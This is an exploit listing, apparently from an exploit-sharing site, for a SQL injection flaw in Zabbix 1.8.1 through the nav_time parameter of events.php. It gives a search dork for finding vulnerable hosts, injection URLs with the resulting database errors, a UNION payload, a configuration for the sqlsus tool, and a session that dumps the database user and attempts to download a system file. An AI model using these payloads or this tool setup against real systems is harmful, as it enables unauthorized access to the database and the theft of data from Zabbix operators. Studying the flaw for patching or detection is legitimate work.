Zabbix <= 1.8.1 SQL Injection Vulnerability

===========================================
Zabbix <= 1.8.1 SQL Injection Vulnerability
===========================================

# Exploit Title: Zabbix <= 1.8.1 SQL Injection Vulnerability
# Date: 27/04/2010
# Author: skys
# Software Link: http://www.zabbix.com/
# Version:Web Application
# Tested on: Apache/*nix
# Dork: intext: "by SIA Zabbix" or "zabbix 1.8.1 copyright 2001-2009"
# Code :

Exploited Link :

http://vulnsite.com/path_to_zabbix/events.php?nav_time=0';

Result:

Error in query [SELECT DISTINCT e.* FROM events e WHERE ((e.eventid
BETWEEN 000000000000000 AND 099999999999999)) AND (e.object-0)=0 AND
(e.objectid IN (-1)) AND e.clock>=0' ORDER BY e.clock DESC LIMIT 1001
OFFSET 0] [You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '' ORDER BY e.clock DESC LIMIT 1001 OFFSET 0' at line 1]
mysql_fetch_assoc(): supplied argument is not a valid MySQL result
resource[/data/www/htdocs/include/db.inc.php:546]
mysql_free_result(): supplied argument is not a valid MySQL result
resource[/data/www/htdocs/include/db.inc.php:548]

Other examples:

http://vulnsite.com/path_to_zabbix/events.php?nav_time=0 AND 1=0 UNION
ALL SELECT 1,2,3,4,5,6,7 from events where 1=1 AND (testvalue) --";

Sqlsus (sqli tool) configuration:

our $url_start =
"http://vulnsite.com/path_to_zabbix/events.php?nav_time=0 AND 1=0
UNION ALL SELECT 1,2,3,4,5,6,7 from events where 1=1 ";
our $url_end = "--";
our $blind = 1;
our $string_to_match = "\"info\">1";
our $post = 0;

$ ./sqlsus -c zabix.pm
sqlsus> start
+----------+--------------------+
| Variable | Value              |
+----------+--------------------+
| database | zabbix             |
| user???? | 'root'@'localhost' |
| version? | 5.0.37             |
+----------+--------------------+
3 rows in set

sqlsus> download /etc/password

sqlsus> ...

#skys mailto:skysbsb[at]gmail.com



#  0day.today [2018-01-04]  #